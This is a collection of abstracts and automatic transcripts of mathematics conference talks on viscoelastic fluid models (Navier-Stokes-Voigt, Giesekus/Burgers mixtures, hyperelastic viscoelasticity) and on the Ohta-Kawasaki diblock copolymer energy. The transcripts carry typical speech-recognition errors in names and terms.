The Navier-Stokes-Voigt model of viscoelastic incompressible fluid has been proposed as a regularization of the three-dimensional Navier-Stokes equations for the purpose of direct numerical simulations. Besides the kinematic viscosity parameter, $\nu>0$, this model possesses a regularizing parameter, $\alpha> 0$, a given length scale parameter, so that $\frac{\alpha^2}{\nu}$ is the relaxation time of the viscoelastic fluid. In this talk I will derive several statistical properties of the invariant measures associated with the solutions of the three-dimensional Navier-Stokes-Voigt equations. Moreover, I will show that, for fixed viscosity, $\nu>0$, as the regularizing parameter $\alpha$ tends to zero, there exists a subsequence of probability invariant measures converging, in a suitable sense, to a strong stationary statistical solution of the three-dimensional Navier-Stokes equations, which is a regularized version of the notion of stationary statistical solutions - a generalization of the concept of invariant measure introduced and investigated by Foias. This fact is also supported by numerical observations, which provides an additional evidence that, for small values of the regularization parameter $\alpha$, the Navier-Stokes-Voigt model can indeed be considered as a model to study the statistical properties of the three-dimensional Navier-Stokes equations and turbulent flows via direct numerical simulations.
10.14288/1.0398185 (DOI)
Okay. Hello everyone. Thank you very much for the introduction. So I am going to talk about viscoelastic rate type fluid models of Burgers type. Viscoelastic rate type models of higher order are used to describe materials with a complex matrostructure. For example, geomaterials like asphalt binders, some synthetic rubbers, also bandaiomaterials like the vitreous in the eye, because they are capable of capturing more relaxation mechanisms. We have some experimental results which I can mention at the references at the end. From this century, for example, for the geomaterials, especially for those asphalt binders, there is also synthetic rubbers. It's very recent. It was done by Rhehor, I think in 2020. You'll see some pictures of the bovine iron and the asphalt just for the beginning. The standard model that belongs to the rate type fluid models of second order is the model due to Burgers. We are in incompressible setting. At my talk, I concentrated also on the isothermal setting. In the formulations of equations, most of the constants are set to be equal to one. The first thing, the first equation is the incompressibility condition. The second is the balance of momentum, where the non-Newtonian part of the Cauchy stress tensor S is such that the second order equation for S holds here, the time derivative is actually an upper convective-olderoid derivative. It is an objective derivative, which means that if I rotate the matrix A by a rotational matrix Q, then QT, AQT, this alderoid is equal to QA alderoid QT. It is observed invariant, which the ordinary material time derivative would not be. But it is nonlinear, thanks to the terms gradient of VA and A times gradient of V transposed, which makes the problem quite difficult. This setting for the Burgers model or for the second order model does not provide a priori estimates given by data of the problem. When it is written as a second order equation, there is also a problem to give the interpretation for the time derivative of S. However, there was some recent observations. I saw it computed by Mark, a geophile in Tuma in 2015. This setting for the Burgers model follows from the setting of a mixture of two alderoid V samples of the first order, where the non-Newtonian part of the Cauchy stress is a combination of sensors B1, B2 for which the first order time derivative holds. To provide it that we set the connection between material parameters O and G in this slide and the material parameters alphas and betas from the previous slide. As you see here, then the setting for these two alderoid V models implies the formulation for the Burgers model of the second order, which you saw in the previous slide. This viewpoint allows one to develop an hierarchy of Burgers type models of the two models of the first order. Here in the terms Bi, there are some exponents. If lambda is equal to 1, then it corresponds to the mixture of two alderoid V models. Here are models for lambdas from R, which can be derived from similar thermodynamic principles as the alderoid V models, or as the mixture of the two alderoid V models. The concepts are that if we suppose that B has the form FFT, such the determinant of F is positive, then there are some deformation sensors. The thermodynamic principle is that the deformation tensor can be split in a multiplicative way into the part that is elastic and into the part that is in elastic. Yes, and there are, yes, so that is the condition that, yes, and those Fs correspond to the elastic response of the ice component of the body. And there are more relaxation mechanisms. Here in the case we have two relaxation mechanisms, so we have i equal to 1 or 2. And all those models come from some constitutive equations, relating the state variables such as the density, velocity, temperature with the stresses, fluxes, etc. Yes, those constitutive equations must be formulated in order to get the whole system of equations, the whole system of equations. And the constitutive equations comes from the relations for free energy and raw and trade of the entropy production. And as you can see, let me briefly mention that the one Newtonian part of Helmholtz free energy is, as you can see, it is, it is always, no, it takes the minimum if there is no deformation, if the tensor B responsible for the deformation is equal to identity. And you may observe that if B is equal to identity, then the elastic part of the free energy is equal to zero. Yes, and it, so the elastic part of the free energy contains the deformation tensors B, it is invariance, it is non-negative and it is equal to, it takes the minimum and this is equal to zero when there is no deformation. So it sounds quite logical. In the isothermal setting, it holds the so-called reduced thermodynamic identity in the form which you see here. And if we sum the, let us say, energy equality for kinetic energy acquired from the balance of momentum, a state from the balance of momentum multiplied scalarly by a velocity. And from this reduced thermodynamic identity, we see that all these models provide a priori estimates for the velocity and for trace of B minus logarithm of determinant of B at time t and they are estimated by V and trace of B minus logarithm of determinant B at time zero. So it is acquired from the energy equality and from the reduced thermodynamic identity where free energy and rate of entropy production has this form. And it is common for all models to be formed. Now let me, yes, yes. So I am going to talk about mathematical results, especially about global solutions. For simplicity, let me now in this talk consider only one deformation tensor, then the second deformation tensor is identity equal to zero. We can acquire from a priori estimates that the problems P lambda has the property that B is L1 if lambda is less than or equal to zero and the time derivative of B is integrable with respect to time if lambda is less than or equal to zero. And there are very few results concerning the weak solutions, the global weak solutions of these, they type fluid models of, let us say, Burgers type. It is those models, lambda. And for example, the question about the old right V model is open. There is some result from 2000 from Lyons and Masmoudi to the model similar to all the right, but instead of the upper conducted derivative that they used an objective time derivative, but instead of gradient of V, they used its anti symmetrical part, which simplifies the analysis, but it does not come from the thermo dynamical principles to which I described before. In 2011, Masmoudi gave some sketch of the proof of weak sequential stability of weak solution to the so called Gizecus model. Gizecus model, it is when we said lambda equal to zero. Masmoudi gave us some very important ideas, but as I said, it is only a sketch of the proof and there are some mistakes. So we decided to do it correctly, not to do even weak sequential stability, but to introduce also suitable approximations and to get mathematical sense of everything as well as we can. We were capable to do it in two dimensions and we were capable of considering two natural configurations, not only one, but two, B1 and B2 for both of them. The exponents lambdas are equal to zero. Yes, it is not a problem, but we are capable to do it only in two dimensions. Let me mention the domain theorem. So under the assumptions that omega is a bounded literature domain, in the assumptions of initial data and also the determinant of f times zero is positive and logarithm of the term f times zero is integrable over omega. We can find the weak solution to the so called generalized Burgers system. It is the quintuple of functions v, f and b that are in the spaces coming from the a priori estimates. They are also continuous with respect to time and their time derivatives are integrable with respect to time. Here you can see the weak formulation, the balance of momentum in the weak formulation and this is the equation for B in the weak formulation. The first four terms are b-aldroid and the rest is v squared minus b is equal to zero. And B must have the form f, f, i, t where the determinant of f, i is greater than zero. So under the assumptions on initial conditions and properties of the determinants of f at the initial time, we are capable to prove the existence of such weak solutions to the system which I have just described. Let me briefly say some crucial ideas about the proof. Now at this talk I will again comment the second tensor B2. I will only talk about the case when B2 is identically equal to zero and in the role of B1 there is B. Yes, I would have f, v, f and b satisfying this weak formulation. So the first crucial idea by, it was given by Masmoudi, it was to consider instead of equations for B equal to f, f, t only the equations for f. And some of this equation, yes, the equation one multiplied scalarly by f transpose from the right, then take transposition of one multiplied scalarly by f from left, gives after summation exactly the formulation of the equation for B, the order plus B squared minus B equal to zero. What are the advantages of this? The first advantage is that we are almost allowed to test the equation for f by its solution. We can prove the positivity of the determinant of f and we get the form B equal to f, f, t directly. Now let me talk briefly about the sequential stability. It is a very important part of the existence proof. So let us consider a sequence of solutions to the problem, balance of momentum and this equation one for f, sequence of weak solutions. We are capable of proof some uniform estimates and from these estimates we have sub sequences converging in some sense to V respectively to f, but not all terms are compact and we need to prove, yield bars denotes the weak limits and we need to prove that the weak limits are exactly what we want. And for this purpose it suffices to prove the compactness of the approximations f epsilon in L2. There are actually three main steps, how to do it. The starting point is to consider those two formulas. The first one is actually the equation for the approximate equation for f epsilon multiplied by f epsilon phi and taking the limit as epsilon goes to zero. The second it is the equation for f, test it or multiply it by f phi multiplied by f phi. And we will be interested about the quantity f squared bar minus f squared and to prove that it is equal to zero almost everywhere which is equivalent to the fact that f epsilon is compact in L2. For the first formula it suffices only in this inequality. Yes it needs to be equality, it suffices only in this inequality. So from step one we should we should derive something like it is prepared for using the ground wall slenna. Yes something like time derivative of the desired quantity f squared bar minus f squared is bounded by L f squared bar minus f squared well where L is an L2 duty function. And by using something like ground walls inequality we are capable of proving that f squared bar is equal to f squared so that the f epsilon are compact. We are not, yes well we are not allowed to use the ground wall element directly because the functions are not regular enough and also we do not know anything about the continuity about f squared bar. Yes we know about the continuity of f epsilon and about the continuity of f but not think about the continuity of f squared bar so that we must do some modification not only with respect to space but also with respect to time. We need to extend all functions by zero and then take modifications over time and space. And as you can see all derivatives are applied to the smooth test functions so that there is no problem to extend everything by zero outside of Qt and to use the fact that that from negative times and outside of omega the smooth functions are equal to zero and it is also equal to zero in some suitable sense after taking the limit. This was the part that was really not doomed but we did. Here I skipped how to prove the step two. I only commented how to get from step two the step three. Yes briefly and it is in mathematical symbols it is described here. So if l was regular enough small f it is the desired quantity where it was continuous with respect to time then it would be direct but it is not the case. So as I said we need to do time space modifying and renormalization to get this equation for inequality from the step two to get the renormalized inequality to extend it for the test functions supported up to the boundary of omega and then after choosing suitable renormalization function to get that the desired quantity f is just equal to zero that f squared bar minus f squared is equal to zero almost everywhere in QT which gives the compactness of approximation and it is a crucial point of weak sequential stability of approximations. I will probably have to finish I am sorry there is too much time. I also wanted to mention that we are capable of proof existence of the approximations v epsilon with properties described above and it is the same model but only with stress diffusion yes you have a priori esteem yes and we do it by work in Smith-Ott and I think we should try to wrap it up because you know we are already doing it over time yes I am very sorry from yes and we have here we have controls of gradient so from the galerkin level to the level of epsilon where we get the compactness of fn for three years yes there the problem about additional terms because the systems are for f epsilon and for f are not the same but it is easy to overcome them. I am very sorry for exceeding the limit and thank you very much for the attention. Okay well thank you very much.
Rate-type fluid models involving the stress and its observer-invariant time derivatives of higher order are used to describe a large class of viscoelastic mixtures - geomaterials like asphalt, biomaterials such as vitreous in the eye, synthetic rubbers such as SBR. A standard model that belongs to the category of viscoelastic rate-type fluid models of the second order is the model due to Burgers, which can be viewed as a mixture of two Oldroyd-B models of the first order. This viewpoint allows one to develop the whole hierarchy of generalized models of a Burgers type. We study one such generalization. Carrying on the study by Masmoudi (2011), who briefly proved the weak sequential stability of weak solutions to the Giesekus model, we prove long time and large data existence of weak solutions to a mixture of two Giesekus models in two spatial dimensions.
10.14288/1.0398190 (DOI)
Thank you for introduction. So this is Sébastien Baudéval from Laboratoire d'Hydraulique, an hydraulics lab from École d'Epon, which means I am my colleague, my usually engineer working on natural water flows rather than mathematicians. So first I'd like to thank you for this, I mean the organizers for this interesting workshop. And also I'd like to acknowledge support by Colload Debris Groups Materials, which is an in-rear applied mathematician group. And last I'd like to dedicate that talk to someone many of us have known and shared the enthusiasm for mathematics and polymer frids in particular, John Barrett, who passed away a bit more than one year ago. So I will talk today about an unstandard viewpoint about viscoelastic stresses in frids. And I say nonstandard nowadays, but it forces me to come back to the origin and it would have not be so unusual maybe a few decades ago. So let's come back to the foundation of viscoelastic stresses in frids. And it forces me to start at the very beginning where frids begin. So frids begin with the Euler model of what? Of the Eulerian description of the continuum. That means it uses field variables. So let's recognize the velocity and the mass density, which depends only on the spatial coordinates x, which lives in a Euclidean ambient space, and it raises any dependence on the particle label, which has been made continuous by Lile-Grange, for instance. That model is now well understood as an expression of Hamilton's stationary principle. So it means you have an action and you can recognize energy conservation and momentum conservation, where you use these only functions of the spatial coordinates. And of course momentum conservation at the level of smooth solution is implied by those representations through what? The placement function, which is the configuration of the particle whose label can be mapped through the inverse since we are working at that level with smooth configuration. And that model was successful. Why? Because in particular, you can define univocally motions. The minimal sense is a small time motion well defined by what? By specifying an internal energy that depends only on the density. So if you should choose it well, the system is a well-known symmetric hyperbolic systems. And then small time motions are well defined as soon as you work in the class of smooth functions with smooth initial configurations. Okay. So that is the beginning. And next, I'd like to move on to real threads, which people started to do soon after, I would say in the 19th century, mainly when Cauchy has consolidated continuum mechanics through the concept of stress. Cauchy was a professor at École des Ponds at that time. And people were looking at better models. So for instance, if you start at the level of a symmetric hyperbolic system, causal motions that depends on time as a semi-group are well defined for real threads, including some thermodynamic constraints, which were also developing at that time. For instance, shocks are well defined. One of the shocks, if you account in addition to momentum and mechanics for temperature, okay, I will not enter that at that level, but I will discuss whether viscous imperfections. So the introduction of viscosity at the level of a compressible continuum can only be justified as an extra stress, which is purely on tropic. If you consider the Newton and Law here, which people came up after Navier, a professor at École des Ponds, to Saint-Venant. Similarly, Poisson and Stokes. So all those people came up with that formula. And we are now widely used to that model. Although it has some fundamental defects, which is the stress is purely on tropic, waves propagate at infinitely fast speed. And more importantly also, the material, the constants, the viscousities, bulk and shear viscousities are not material parameters. They are dynamic constants. They depend on the configuration. So that's why people came after another question and very soon after Maxwell, just after proposed a model that depends on material parameters to account for what? For viscosity in gases as soon as 1867. And to go forward, what he proposed is to interpret that empirical expression for viscous stresses in the limits of a relaxation of a model with a relaxation time, which is supposedly also a material constant. The problem is of course that at that time it was very difficult to measure such material parameters as what you see here in the original article of Maxwell. He called it E for the elasticity and T for the relaxation time. So new dot here, which is the shear viscosity, is nothing but the elasticity divided by the relaxation time. So that was the problem and the model was more or less forgotten for one century. And the question is now, when did it occur that it was useful? Only when people came up with a real freed that would allow for measurements of such things, especially after Second World War, when people were very much interested by rubber. And polymer freed were attracting attention. So people wanted to predict, to compute and to explain also what they saw. Weisenberg, a mathematician, was one of the first to make the connection between Maxwell model and polymer freed. Eckhart also did the connection. And they observed some features also of the polymer freed that question, of course, at the same time that it makes it relevant, it questioned the extension of Maxwell model, which was 1D, two multi-dimensional flows. So that was the beginning of the question about how to make it multi-dimensional and all the way soon after came up with a concept, which is material frame indifference, which is much stronger assumption than simply Galilean invariance. The stress, the extra stress as concerns the viscoelastic stress is required to be objective, to be independent of even a time-dependent rotation of the frame. So it means you have a very constraining notion of acceptable extra stress. And today this is a very well-accepted formulation as a departure for viscoelastic fluid modeling. Volver work is an incompressible model of freed at, let's say, constant temperature. We will see after why this is a problem. And they fix the density then, and they add to the pressure, which is then dependent on this, the two components, which depends on the polymer suspension, the solvent, which is purely viscous, and the polymer one, which is Maxwell transform into a multi-dimensional equation, multi-dimensional version, where you recognize here an objective derivative. You have different choice among the golden two-walters derivatives. And this would be the departure. Still, many questions arise. One was, could we account for Schilding, Schilding, which are things not really well grasped by that model? And many people were stick that at the well-seen, anthropic dependence of the stress. So they started looking at the physical, statistical physics foundation of that formula for anthropic stress. And the formula was readjusted by Ruth, and many people working with statistical physics interpretation of entropy. For instance, today I will stick to Maxwell model, but the question would be how to make the statistical physics suggest you a new formula for the entropy. So at that level, we could just stop and say this is a question for physicists. In fact, it echoes the presentation by Tony LeLieve, who showed us that you could come up with a very complicated model at the statistical physics level, and then try to infer an entropy, then an anthropic extra stress for the macroscopic level. Okay, this is indeed an art for statistical physics, and it could be justified from the continuum mechanics, I would say, purely macroscopic viewpoint today with what people sometimes call the metriplectic viewpoint. So generic is one instance of such a justification to explain where, how you can connect microscopic level with macroscopic level. Okay, today I will stick to the fact that it requires at some point the introduction for justification with a second principle expressing thermodynamics, it requires the introduction of another variables, let's call it C, and in that framework of statistical physics, it's a tensor interpreted as the expectation of this, second order, this matrix. Which is the conformation of X is a vector of the orientation and extension of a dumbbell, which follows typically a long-jouin equation, that means it is over-dumped long-jouin here. It is a static equilibrium of a polymer, of just a very basic polymer model with two beads and one spring, which is heated by that under-run mount at constant temperature. Okay, and the model, statistical physics can be worked around to came back to that purely macroscopic model through a formula, which I have put here. So this is called, okay, I have just forgotten the term of expression for the connection, for the stress formula. And okay, at that point, as I said, you could stop, but in fact, it raises still many questions and questions for engineers. So one question is, how can you use that actually for forecasts? And when you compare, so this is a problem as we'll explain just after, but it also raises the question of does it really account for temperature change, which we see in non-isothermal flows? And it doesn't. It turns out that even in rubber-like polymer frids, it turns out that some part of the elasticity is not purely entropic. That means only purely attributed to some diluted polymer molecules, but it is also linked to the deformation of the wool frids, like compressibility in a gas. It means then here to the suspension, if you may. And then other questions come. And before going to the one solution of that and a new formulation, a new interpretation of viscoelasticity, which I find beneficial to some mathematical understanding of the viscoelasticity. Let me mention here that if people often nowadays justify, for instance, that formula with an upper convective derivative for the stress linked to dumbbells, you can also just identify it here with the derivative associated to the Cauchy-Green deformation. So there is no necessity for such a link. So there are different links. Here are some. So the first thing I'd like to mention here is that the model you saw just before has been used extensively by many people and with engineering viewpoint, essentially. And the fact that you have infinitely fast propagation speed is written down in it because they work with an incompressibility assumption. And usually they add some viscous suspension so that also not only to account for real physics but so that the model is actually computable. And in fact, it turns out that those models have some instability, numerical instability. When you approach what I would call the purely elastic limit, when you think of Maxwell simple model, it means when you have a very large relaxation time and you forget about the system extension. Actually, people worked about the connection with elasticity, which is deeply linked with what I mentioned before, the non-idothermal flows. How was that tackled? It was tackled by people with a different community mostly, I believe. People from the mechanics, rational mechanics at that time. And there are mechanisms with a strong mathematical background and maybe unfortunately too obscure to abstract formulation. So after truth, they all know. And sometimes they didn't really came up with a practical, useful way except the KBKZ model, which is a very specific fading memory material, where the conformation, which you showed just before, which adds that very particular, back here, the conformation tensor, which has a very particular evolution law. In fact, since you can interpret it also from a purely macroscopic viewpoint here and recall the derivative of the deformation tensor, you can make the connection at the purely macroscopic level. So that would be a nice different link without statistical physics to what? To hyperelasticity, then to a model where viscoelasticity is linked not with pure entropy, but also with elasticity. There are other problems with that model. So one of our attendants will confirm today that he did verify that the model was useful for mathematical interpretation. But the point is that the model has not been used very much because it is quite difficult to use. You have to put that integral formula within the differential ones for the momentum balance. And in that, it has not been worked much around for, I mean, shielding, all those difficulties which are additional to the Maxwell-Fried concept could not really be treated within that frame. And in fact, people could only change the formula here for what is called the fading memory kernel. They could invent different fading memory, but it was not really physical. It was really abstract and not connected to real physics. And in fact, it was not really useful because what is shown in fact in Michael Renadier's paper, I think, is that only lower conductive and upper conductive Maxwell models are actually 100% well-posed, I mean, for very smooth conditions. OK, there are plenty of assumptions, but they were the best model coming up from that study. So what I suggest today is to look at the link between viscoelasticity and hyperelasticity from a different viewpoint. And I will come up with a model which is a first-order system of conservation laws that extends the usual polyconvex, white polyconvex because it would be dealt also elsewhere for a well-posedness, a coelastic convex elastodynamics of hyperelastic materials that allows what? The two laws viscoelastic flows of macrosphites compressible, of course, and then formally contains naving stocks. So the good point is the elastic stresses, they are not in the frame of viscoelastic stresses, they are not purely entropic, but they have some energetic origin. Then shear waves can be propagated at finite speed, and it still involves incompressible flows, asymptotically, of course, in a low-mac number limit. And it is also compatible with the second principle formalism. Of course, that means we can make a dependence on temperature. I will not go very far in that direction because it adds a lot of complexities, but for people familiar with hyperelasticity, it will be clear. OK, just one point. I think that direction was more or less, I would say, tried by people, famous chemists in particular, Berice in the 90s, but they came up with a hyperbolic model that was not very satisfying, and it has many failures. So the connection is not direct. So now I will go back to elasto dynamics and explain to you how they introduce viscoelastic stresses in elasto dynamics. So the first point is to connect elasto dynamics with Fritz. So as you remember, Euler model could be derived according to Lagrange Hamilton principle. And in fact, if you remember about phi t as being the configuration, the placement of the configuration at phi t, one variable was not introduced, which is essential to deal with general Fritz, is the gradient, deformation gradient. Well, we use only its determinant. And of course, for Fritz, it is very practical to reduce the system of equations. So this is one equation for the deformation gradient that comes from the definition as from the placement function, and which implies the equation to the conservation node for determinant. The system can be reduced by seeing that the stress in a fluid doesn't depend on the full deformation gradient, but only on its determinant. And then that's how you come up with Euler just by erasing the first equation. And you have a reduced system that has been worked on very much by people around Marsden, I think. You make different material assumptions, and you came up with a different reduced version of the Lagrange Hamilton principle. The point is that here, I want to make the connection with elasticity, and I will not forget about, I will not forget the first equation. And I will show you how you go to Euler-Wahne description of hyper-elastic materials. Well, just by choosing an internal energy that does not depend only on the determinant, but as is well known for the Ney-Wikian model, on the full deformation gradient here in a convex way. So you have that Cauchy stress, and this is the Euler-Wikian description of hyper-elastic materials of the elastodynamic hyper-elastic materials. And this is completely equivalent at the level of smooth solution with the material description. So here I introduce what is... I'm sorry to interrupt you. You're slightly over time already, so please come to an end soon. Sorry. Okay. So this is the usual connection, and to finish in a second, I need to introduce... Okay. So I need to introduce viscoelastic stresses. So I do that by introducing an additional material variable, which is reminiscent of what people do when they introduce the conformation tensor. They introduce what, a second level of description to explain where thermodynamics and exchange with forces from a different level, polymer extensions could express. And the good point is that, in fact, we can introduce something which is only an advected material variable, which depends on the reference configuration, plus a source terms. This is completely compatible with hyper-elasticity if we look here at the stress, which is given by that L-modes free energy. And the connection with KBKZ is clear. In fact, KBKZ has just rephrased that differential equation as using its explicit solution and additional assumption to put the formula here inside 12 instead of A. But it makes it integral and then very difficult to solve. What I suggest is to keep the level of description at the pure differential system of conservation laws. Well, it allows, of course, multi-time solution in the usual polyconvex setting. So the difficulty is to show that we have an equation, we have an energy which is actually polyconvex in all variables, including the new one. In fact, the new one is not very practical to show a polyconvexity. You have to change it to anything which is a function of it because it is simply advected. And using, for instance, Y, which is the inverse of the square, you can actually show that you are polyconvex and then you have a well-posed model, this is the equation for the energy. You have a well-posed model for small-time smooth motion. And it offers, I think, many entry points for such questions as how to deal with compressibility. And it means actually account for non-isothermal flows where there are some configuration dependence on the elasticity and non-polymer conformations. And of course, it offers also a link with different imperfections in fluids. Because this quailasticity, of course, it is also useful for rubber-like fluids. But it is also being looked at for many glassy systems, which are not only simple dilute polymer fluids, but which have some more different non-viscoelastic stresses. So just the parameter A, I think, is a good statistical parameter to go in that direction. And we stop here because I'm running out of time, but I am ready to answer questions. And I suggest you look at an article just in press in M2AN if you want all the heavy details. Thank you very much.
In continuum models for non-perfect fluids, viscoelastic stresses have often been introduced as extra-stresses of purely-dissipative (entropic) nature, similarly to viscous stresses that induce motions of infinite propagation speed. A priori, it requires only one to couple an evolution equation for the (extra-)stress with the momentum balance. In many cases, the apparently-closed resulting system is often not clearly well-posed, even locally in time. The procedure also raises questions about how to encompass transition toward alastic solids. A noticeable exception is K-BZK theory where one starts with a purely elastic fluids. Viscoelasticity then results from dissipative (entropic) stresses due to the relaxation of the fluids'"memory". That K-BKZ approach is physically appealing, but mathematically quite difficult because integrals are introduced to avoid material ('natural') configurations. We propose to introduce viscoelastic stress starting with hyperelastic fluids (like K-BKZ) and evolving material configurations (unlike K-BKZ). At the price of an enlarged system with an additional material-metric variable, one can define well-posed (compressible) motions with finite propagation speed through a system of conservation laws endowed with a "contingent entropy" (like in standard polyconvex elastodynamics).
10.14288/1.0398148 (DOI)
Okay. Sorry. Okay. I want to apologize because I'm not going to talk on complex fluids, but nevertheless, the model I'm going to talk about is related to material science. And in particular, it's related to the nanostructures which are formed in dibloch copolymers. Diblochopolymers are chains of two different monomers, say of type A and on type B, which depending on the interaction, chemical interaction between the two monomers and depending on the temperature and on the volume fraction of one monomer with respect to the other, exhibit different, different nanostructures, which are quite interesting from the mathematical point of view. Yeah, you can see two typical situations in on the left hand side, you see LaMellar structure and on the right hand side, you see the blue monomer forming spherical structures surrounded by the red one. Well, of course, in both cases, you have a thin interface separating the two structures, the two monomers, but the geometrical features of these structures are pretty clear. However, the situation is more complicated than this, because other structures do appear, which are spheres inside. So one of the two monomers forms spherical structures inside the other one, or cylinders, or more complicated structures such as gyroids and diamonds. You see, this depends on the relative amount of the mass of one monomer with respect to the total mass. And finally, when the two masses are almost comparable, you get LaMellar structures. Okay, the interesting point is that, sorry, but do you see all the screen also the bottom. Yes. Okay. What is interesting from mathematical point of view is that all these structures are boundaries of sets with constant mean car. And in order to explain why these geometrical precisely geometrical structures appear. One model have been proposed a few years ago by precisely in 1986 by Ota and Kawasaki. It's a very simple model, but as I want to explain, it's quite effective in explaining the configuration that you see. Okay, so omega is your container, the container of your die block copolymer, and u is the function with values between minus one and one, which describes the density. So you have u equal to one when you are in a region where the monomer a is, and then you have minus one on the monomer B. And of course you have intermediate phases, intermediate value between minus one and one on the interface. So in this model, the idea is that the configurations that you observe are those who are locally minimizes of an energy made up by two contribution. The first one is an attractive short range interaction, which is given by its of the type of the Kahneliard energy or Modica Mortola, if you want to call it this way, in which, as you can see, the well, epsilon is a very small parameter. So if you want to minimize this part to make as small as possible this part of the energy, the best thing you can do is to take the function u as close as possible to one and minus one. So to stay on the pure phases. However, if you are on a pure phases and you have to pass from one phase to another, you have to pay a gradient, but they don't pay so much because this gradient term, the integral, the square is multiplied by a small epsilon. On the other hand, this term, this term is what this term is given by the solution of the Laplace equation with the density function u on the right hand side and then you take the square of the gradient of the solution times a positive constant. Okay, as I said, in the otakawasaki model, epsilon is very small wire gamma zero is a constant which depends on the chemical properties of the materials and on the temperature. It is convenient if you want to study this problem from the mathematical point of view in order to understand the the formation of these configurations to let epsilon go to zero, in which case you can prove that in the in a precise term in precise sense which is the gamma convergence sense. This means the minimum problem attached to these energies, he of epsilon converge to the minimum problem of a limit energy, where this time the function you only takes two values minus one and one so you have pure separated phases. Well, the constant here in when passing to the limit changes up to this factor three over 16, but the the first part of the energy goes to what goes to the jump measures one half of the jump of the function you across the interface so the function you now is takes only two values minus one and one. And so this term is nothing else than the perimeter so the area of the interface separating the two phases. And in fact the function you is, you can see as the difference is nothing else now that the difference of the characteristic function of the set E occupied by the phase a minus the characteristic function of the set omega minus E occupied by the phase B. So in the end you have a sort of geometrical problem in which you have these area term plus this no local term given by this potential where, again, the, the, you take the gradient square of the solution of the Laplace equation with the right hand side the density function. It is convenient if you want to understand the problem from the mathematical point of view to assume that to work with periodicity condition. There are two reasons. The first reason is that periodical structure are what you physically observe. And second reason is that we all can, we all, I mean people working in this on this problem. So the fact that that that equilibria of the of the of the previous of the previous energy the the the limit of the otakawasaki energy when epsilon goes to zero should be periodic. The conjecture have been, I don't want to discuss this point this conjecture have been have been partially solved. But let's say okay, let's go for periodicity condition. So this is your general energy, the perimeter of the interface inside the flat torus to your unit cell, plus the gradient of this function V, which is as I say the solution of minus or a plus and you'll be minus the volume fractional of your set E which in the in the in the flat torus is just a difference of the volume of the volume of E minus the volume of the of the complement. And one problem is that that you want to understand in order to explain the configurations that you saw in the picture is under which conditions stable critical points for this energy are local minimizers. And I added this problem by calculated the second variation of this energy this has been done by Choxy and stem back in 2007. And there is also a series of paper by Ren and way, where they prove that certain particular configurations are local minimize are stable critical points and our local minimizers with respect to some special variation. What do I mean by local minimizer by local minimizer. I mean that that if you take another configuration with the same volume and you measure the distance between your local minimizer E and the configuration F by taking the volume of the symmetric difference. The symmetric difference up to translation because we are working in a periodic setting, then you want that your energy is strictly lower than the energy on F. Okay. So you can see the mean curvature or equivalently the sum of principle coverage plus four times the constant gamma which appear here in the energy in this non local term times the function V is constant. You see, since in practice this constant gamma is very small, this already gives you an idea of why the configuration you observe look very like constant mean curvature equation because in practice the mean curvature is almost constant for local minimizers of this but in order to talk of stable of stable critical point you have to introduce the second variation that you can do very easily by fixing a vector field X, considering the associated flow. And, but be careful, we want, we want to study local minimizer my eyes under a volume constraint. So in order to be sure that that this family of deformation that you get by solving the associated flow keeps the volume constraint you have to assume that the vector field X as a zero divergence at least in a small neighborhood of your set. Then what do you do, then you define the second variation as the second derivative of the energy at time zero. And what you get that you get a first term, which is the second variation of the area term plus two other terms coming from the non local guy be here is is the is the sum of the principal curvature so the norm of the second fundamental form and G is the green function associated to the Laplace with the same pattern with periodic setting. So, if you have a critical point, so solution of the oil and I'm just a question you call it stable if this second variation is strictly positive for all sets for all vector fields with zero divergence around the boundary of the field, which you can equivalently replace by considering these quadratic form as a quadratic form on a function five because as you can see the quadratic form actually depends on the normal component of the vector field X. So, if you have a quadratic form that is X dot new by a function five. What do you want is that the quadratic form that you obtain is strictly positive for every fine non zero. So, the convergence condition, which translate in the condition that the the mean, the, the, the mean of the, the integral mean of phi over the boundary is equal to zero. The first result that you get in this framework is the following which I proved a few years ago with the Milo Sherby and Massimiliano Morini, which tells you that any critical configuration with positive second variation in this sense is a strict local minimizer, but if you have another configuration with the same volume close in distance to the set E, then not only the energy increases, but increases up to a factor which goes like the square of the distance. And this that I said up to now is because now I want to consider the evolutionary counterpart of the model, which is the so called non local Mali and second flow in which you want to study a smooth flow of sets, which solves the following equation. Here VT is the normal velocity at the boundary. On the right hand side, you see the jump of the normal derivative of a function w which is a harmonic outside the boundary of the evolving set, which is equal to the mean curvature of the set of the boundary plus four times the function V where V is as before the solution in your set omega of the equation minus Laplacian equal to U minus the integral of the mean value, the integral mean of U. Recall you is the function which is one over E and minus one on the complex on the complement of V. Recall that this wall, this flow is volume preserving because if you take the derivative of the volume of the evolving set, you get the integral over the boundary of the normal velocity but this is equal to this jump of the of the normal components which in turn is equal to zero. The flow is volume preserving and this flow can be obtaining as the gradient flow of the otakawasaki energy by letting epsilon to zero and this was proved by Alikakos Bates and Chen in 1994 and Lae. I guess in yes for gamma equal to zero and the Lae in the general case gamma different from zero. So let this flow and the sharp counterpart which is a nonlocal malicekirka flow, they can be seen as the H to the minus one one half sorry gradient flow of the otakawasaki energy, which for the case in which gamma is equal to zero so the energy coincides with the with the surface energy. Coincide with ill show flow with surface tension. Let me tell. Clearly, the, the, the, let me remark that that this equation is a third order parabolic equation because these, these jump of the of the normal components of W here is essentially related to the to the one one half Laplacian of the of the mean carbure. Okay, what are the features of this flow is that singularities may appear at five even thought the flow is a instantaneously regularizing singularities may appear in finite time. There is no comparison principle, the equation is a third order third order nonlinear parabolic equations on there is no comparison principle, differently from the mean curve to the question convexity is not preserved along the flow. And local in time existence was approved for this equation only in 2002. Okay, and just to finish because I think my time is over. The result I want to, I want to mention, which is a consequence of the stability result I have mentioned before. Concerns the stability of the solution of this equation. And it is a result which was proved by a Sherby Euling Marine and myself last year, and it goes like, like this, assume that F is a strictly stable set, and that you start your flow with an initial that which is closing C one to this strictly stable set and such that for the initial that the gradient of this term which is the sum of the of the mean curvature plus four times the function V is very small. So you are in a situation in which remember your strictly stable set as a constant mean curvature. This condition tells you that the roughly speaking the L two of the mean curvature of your initial datum of the gradient of the mean curvature of your initial is not to be. Then the flow starting from zero is defined for all time and converges exponentially fast, not precisely to the set after the strictly stable set, but to a translation of the set. And the reason why it converges to a translation is that because because in the, in the flow. There is a there is also a translation of components. So, not only you have you have you have the boundary of the evolving set with our changing but together with the boundary, you are also moving by a quantity which again is you can prove is this translation effect is smaller and smaller, as long as you start close to the strictly stable set. Okay, I stop here. Sorry for being a little bit late and thank you for your attention. Thank you very much.
